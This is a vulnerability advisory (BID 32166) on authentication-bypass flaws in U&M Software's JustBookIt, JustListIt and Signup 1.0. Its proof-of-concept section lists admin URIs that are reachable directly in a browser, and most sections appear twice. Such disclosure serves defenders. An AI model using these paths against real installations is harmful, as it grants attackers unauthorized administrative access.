Multiple U&M Software Products Authentication Bypass Vulnerabilities
BID:32166
Info
Multiple U&M Software Products Authentication Bypass Vulnerabilities
| Bugtraq ID: | 32166 |
| Class: | Design Error |
| CVE: |
CVE-2008-6718 CVE-2008-6719 CVE-2008-6717 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 07 2008 12:00AM |
| Updated: | Jul 05 2016 10:01PM |
| Credit: | G4N0K |
| Vulnerable: |
U&M Software Signup 1.0 U&M Software JustListIt 1.0 U&M Software JustBookIt 1.0 |
| Not Vulnerable: | |
Discussion
Multiple U&M Software Products Authentication Bypass Vulnerabilities
Multiple U&M Software products, including JustBookIt, JustListIt, and Signup, are prone to multiple authentication-bypass vulnerabilities.
Attackers can exploit these vulnerabilities to gain administrative access to the affected application.
The following versions are vulnerable:
JustBookIt 1.0
JustListIt 1.0
Signup 1.0
Multiple U&M Software products, including JustBookIt, JustListIt, and Signup, are prone to multiple authentication-bypass vulnerabilities.
Attackers can exploit these vulnerabilities to gain administrative access to the affected application.
The following versions are vulnerable:
JustBookIt 1.0
JustListIt 1.0
Signup 1.0
Exploit / POC
Multiple U&M Software Products Authentication Bypass Vulnerabilities
Attackers can exploit these issues via a browser.
The following example URIs are available for the different applications:
JustBookIt
http://www.example.com/admin/user_manual.php
http://www.example.com/admin/user_config.php
http://www.example.com/admin/user_kundnamn.php
http://www.example.com/admin/user_kundlista.php
http://www.example.com/admin/user_aktiva_kunder.php
http://www.example.com/admin/database.php
JustListIt
http://www.example.com/admin/start.php
http://www.example.com/admin/aktivitet.php
http://www.example.com/admin/prop_aktivitet.php
http://www.example.com/admin/kategorier.php
http://www.example.com/admin/konfig.php
http://www.example.com/admin/security.php
http://www.example.com/admin/manual.php
Signup
http://www.example.com/admin/adminstart.php
http://www.example.com/admin/admineventtype.php
http://www.example.com/admin/admineventdetails.php
http://www.example.com/admin/admineventlist.php
http://www.example.com/admin/adminuserslist.php
http://www.example.com/admin/adminleaderslist.php
http://www.example.com/admin/admindatabase.php
Attackers can exploit these issues via a browser.
The following example URIs are available for the different applications:
JustBookIt
http://www.example.com/admin/user_manual.php
http://www.example.com/admin/user_config.php
http://www.example.com/admin/user_kundnamn.php
http://www.example.com/admin/user_kundlista.php
http://www.example.com/admin/user_aktiva_kunder.php
http://www.example.com/admin/database.php
JustListIt
http://www.example.com/admin/start.php
http://www.example.com/admin/aktivitet.php
http://www.example.com/admin/prop_aktivitet.php
http://www.example.com/admin/kategorier.php
http://www.example.com/admin/konfig.php
http://www.example.com/admin/security.php
http://www.example.com/admin/manual.php
Signup
http://www.example.com/admin/adminstart.php
http://www.example.com/admin/admineventtype.php
http://www.example.com/admin/admineventdetails.php
http://www.example.com/admin/admineventlist.php
http://www.example.com/admin/adminuserslist.php
http://www.example.com/admin/adminleaderslist.php
http://www.example.com/admin/admindatabase.php
Solution / Fix
Multiple U&M Software Products Authentication Bypass Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Multiple U&M Software Products Authentication Bypass Vulnerabilities
References:
References:
- JustBookIt Homepage (U&M Software)
- JustListIt Homepage (U&M Software)
- Signup Homepage (U&M Software)